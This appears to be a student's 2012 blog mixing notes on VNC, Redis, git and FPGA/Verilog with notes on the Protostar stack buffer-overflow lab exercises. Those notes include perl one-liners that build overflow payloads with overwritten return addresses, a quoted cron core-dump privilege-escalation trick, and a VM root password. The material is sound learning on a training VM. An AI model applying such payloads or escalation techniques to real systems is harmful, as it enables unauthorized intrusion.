Thursday, October 25, 2012

Gooey VNC Moon Chicken on Trucks

So I don't forget:

On trucks, start a VNC server.
On Charybdis, use Chicken of the VNC to connect.


I happened to ssh into a machine called iveco, and vncserver started running on display 3 (thus the 5900 + 3). Enter an ssh password and there you have it - a gooey, gui connection :3  



This is the CS dept guide to VNC, though it does not use SSH tunneling.
Posted by at No comments:

Sunday, October 7, 2012

Exercises by Exercise

(DRAFTS I SHOULD'VE POSTED BUT DIDN'T)
====================================================================

EXERCISE 0
Goal : Modify the 'modified' variable.
====================================================================
First off, include the directory for protostar executables in your shell PATH. 

In the code, notice that modified is declared (and therefore stored) before buffer. The stack grows down but writes up, meaning modified has a higher address than buffer because it came first. Writing up from the base of buffer, we can provide too much input and change modified.

=====IMPLEMENTATION=====:

====================================================================


EXERCISE 1
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================
Note the important hint that "Protostar is little endian." When you don't take that into account, it fails. 

=====IMPLEMENTATION=====:


====================================================================

EXERCISE 2
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================

Perl script
=====IMPLEMENTATION=====:
====================================================================


If you put the line:
set disassembly-flavor intel
in the file ~/.gdbinit it should work.
enable ssh server

READ THIS: http://insecure.org/stf/smashstack.html

[I SHOULD REALLY CLEAN THIS UP... EVENTUALLY....]
#0
perl -e 'print "A"x65' >attack0.sh
#1
perl -e 'print "A"x64, "dcba"'>attack1.sh
#2
set environment var with perl
get newline into buffer overflow ==> just use  ' . '
#3
[picture from 4:20ish here 7/24]
perl -e 'print "a"x64 . "\x24\x84\x04\x08"' > attack3.txt
./stack3 < attack3.txt
#4
perl -e 'print "A"x76 . "\xf4\x83\x04\x08"'>attack4.txt
#5
[pic @ 5:35 7/24 here]


ON PROTOSTAR:
ip addr (get ip address )

TERMINAL ON OSX
ssh user@IPADDRESSHERE
user
bash


Posted by at No comments:

Go Redis! (Graph Database)

(DRAFT I SHOULD'VE POSTED BUT DIDN'T)

Redis Interactive Tutorial
My (redundant) summary:
  • Access Data
    • SET my_key "my_value"
      • "OK"
    • GET my_key 
      • (returns my_value)
  • Manipulate Data
    • DEL my_key
      • returns 1
    • INCR my_key
      • returns new value
    • SETNX my_key "my_value"
      • sets if does not exist (T/F success)
    • EXPIRE my_key time_limit_in_sec
    • TTL my_key
      • returns remaining lifespan in seconds
      • -1 if immortal
  • Basic Datatypes
    • Set
      • SADD my_set "my_value"
      • SREM my_set "my_value"
      • SMEMBERS my_set
        • lists members
      • SISMEMBER my_set "my_value"
        • T/F is a member
      • SUNION my_set my_other_set
        • union of sets, deletes non-unique entries
    • Sorted Set
      • ZADD my_set my_param "my_value"
      • ZRANGE my_set START# END#
    • List
      • LRANGE my_list #STRT #END
        • 0 to -1 gives entire list
      • LPUSH/LPOP my_list "my_value"
        • pushes/pops to end of list
      • RPUSH/RPOP my_list "my_value"
        • pushes/pops to beginning of list


Posted by at No comments:

Wednesday, August 1, 2012

HAKHAKHAK

GET STARTED ON EXPLOIT EXERCISES

Memory Basics 
Eric and I sat down and drew a picture of Memory Layout.

+   Stack Frames contain: Input Params, Local variables, and Saved Registers
+   EBP --> base points to top of stack 
+   ESP --> points to bottom of current stack frame
+   EIP -->  points to next instruction
+   Stack grows down but writes and reads up.

Buffer Overflow ===> Second stack frame has a lower address than first stack frame. Since the stack writes up, we can overflow the buffer and write over the rest of the frame until we get to the saved EIP.


Endian-ness... It's a Byte Thing
Ex. Represent this : 1234

Say each word represents a byte, and each letter is a bit (ignoring the 'well-actually' details.)
In big endian :
ONE | TWO | THREE | FOUR

Little equivalent of this is :
FOUR | THREE | TWO | ONE

NOT THIS:
RUOF EERHT OWT ENO


The order of bytes is interpreted differently, but the byte content is unaltered.  The bits in the bytes don't mirror.



Potential Tools
+   RATS Static Analysis
+   Splint

+   Radare - Disassembler! Basic commands to start with:
  • r2 [name of executable]
  • af @ sym.main <== analyze main function
  • pdf @ sym.main <== print main (now analyzed) function


INSTALLING RADARE2 ( on PROTOSTAR vm )
su root
godmode
apt-get install flex bison   ///dependencies for radare
git clone https://github.com/radare/radare2.git
./configure --prefix=/usr
make
make symstall

Next Post: Document all the Stack exercises! ...now to properly make sense of my messy notes... -__-;
Posted by at No comments:

Tuesday, July 31, 2012

More Git Tips - Pair Programming Setup

Nathan and I forked Nick's appletoo repo and can push/pull changes from our own branches.


=========================
A Few Useful Commands
=========================
Push upstream
git push -u origin [NAMEOFBRANCH]

Pull from specific remote server
git pull [REMOTESERVERNAME] [BRANCHNAME]

Add remote server
git remote add [LOCALSERVERNICKNAME] [URL]


=========================
A Few 'Oh-Duh' Commands
=========================

Check possible remote servers
git remote


Clear staging area
git reset

Check status
git status

Check differences
git diff
Posted by at No comments:

Tuesday, July 24, 2012

Exploitation -- The way I like it.

========================================================
Gibberbot
Possible Project / Contribution Candidate
========================================================
Notes
+  Uses XTPP protocol for messaging 
+  Follow Gibberbot GitHub instructions
+  Helpful guide to fork-a-repo

FollowUp: Steffi continued on this project. Mostly code clean up. Project - Interest mismatch.


========================================================
Android
Area of Interest / Possible Project

========================================================

Notes
+  Mission = root an Android device using any available means.
+  Sub-Mission: Define 'available means.'
+  Downloaded Android Source (here)
          o  Takes at least an hour to grab everything. 

Operating Systems Lab 1:
"One interesting case I found in my research was a program that set its current directory to /etc/cron.d (where scheduled tasked are stored). The hacker requested a core dump happen in the case of an emergency crash of his process, then recruited another process to kill it. The dump occurred, and chron treated it as a text file. When it was next run, because chron had root privileges and was running the process, the process also had root privileges."
... Inspiration? ....




Understand a Pre-Existing Exploit
Eric and I traced this code, which successfully rooted Android v2.2
ARM Stack looks like this

Posted by at No comments:

Saturday, July 21, 2012

FPGA + Verilog

Board Details :
PICO Computing E-101 


  • Spartan 6 data sheets here 

  • "Data Sheet" here (crap) 

  • Chip Data Sheet here 

Good for cryptography/cryptanalysis, huh? ... huuuuuh..... Zodiac killer project application... ?!? :D
================//==================

Using "VHDL: Learn By Example" to Understand VHDL:

Entity ENT_NAME is
port(    VAR1: in std_logic;
            VAR2: out std_logic_vector(7 downto 0);
             ...
             VARN: in std_logic               <--------------NO ";" for last entry
);
end ENT_NAME;
architecture ARCH_NAME of ENT_NAME is
    component OTH_ENT_NAME is
    port(    A:   in std_logic;
                ...
                B:   in std_logic                     <-------------------NO ;
     );
     end component;
    signal SIG_NAME: std_logic;
    ...
begin
    process( INP_VARS....)
    begin
    [LOGIC GOES HERE];
    end process;
    GATE_NAME: ENT_NAME port map (COMP_VARS=>ENT_VARS);
end ARCH_NAME; 
VHDL QUESTION:     Q: When is a process necessary? For multi-line logic only? For dependencies or certain operations?
     A: Processes are required to reuse code. (Change in parameter values triggers re-run).
 ================//==================

Verilog

Using "Verilog: Learn By Example"

Blocking vs. Non-Blocking assignments  
+ = Blocks procedural flow (Assignment happens first. Rest blocked)        
+ Use for time sensitive     
+ <= Doesn't         + Can be executed w/o dependency/timing issues        + Several register assignments in same time step        + Resembles actual hardware more Verilog QUESTIONS:     Q: When is it necessary to list "@ always" parameters with "or" vs. a comma?


BLOGGER IS MESSING UP MY FREAKING FORMATTING. ^ GAAAAH
 ================//==================


Driver Issues:
Install Digilent Adept System (at least v2.4)Install Plugin (follow pdf directions)answers here maybe? http://www.xilinx.com/support/answers/30184.htmDocumentation we were following for  DRIVERS http://www.xilinx.com/support/documentation/user_guides/ug344.pdf

NOPE^
I HATE DRIVERS.


But not really.


Please work.


I'm soorrrrryjustworkplzstopthetortuuuureee....


*********USE THIS DRIVER - PICK 64 BIT EVEN IF ON 32 BIT ****************


 ================//==================


Immediate Goal: Run and understand this example.
Helpful when adding pins...kinda...notreally....
- Testbench related here




 ================//==================


Misc Resources:
TestBench TutorialVerilog 
TutorialVerilog Workflow (Work flow, colorful tutorial)
Misc:
WANT (to make) --> Noisy Jelly 
Understanding RSA
Posted by at No comments:
Subscribe to: Posts (Atom)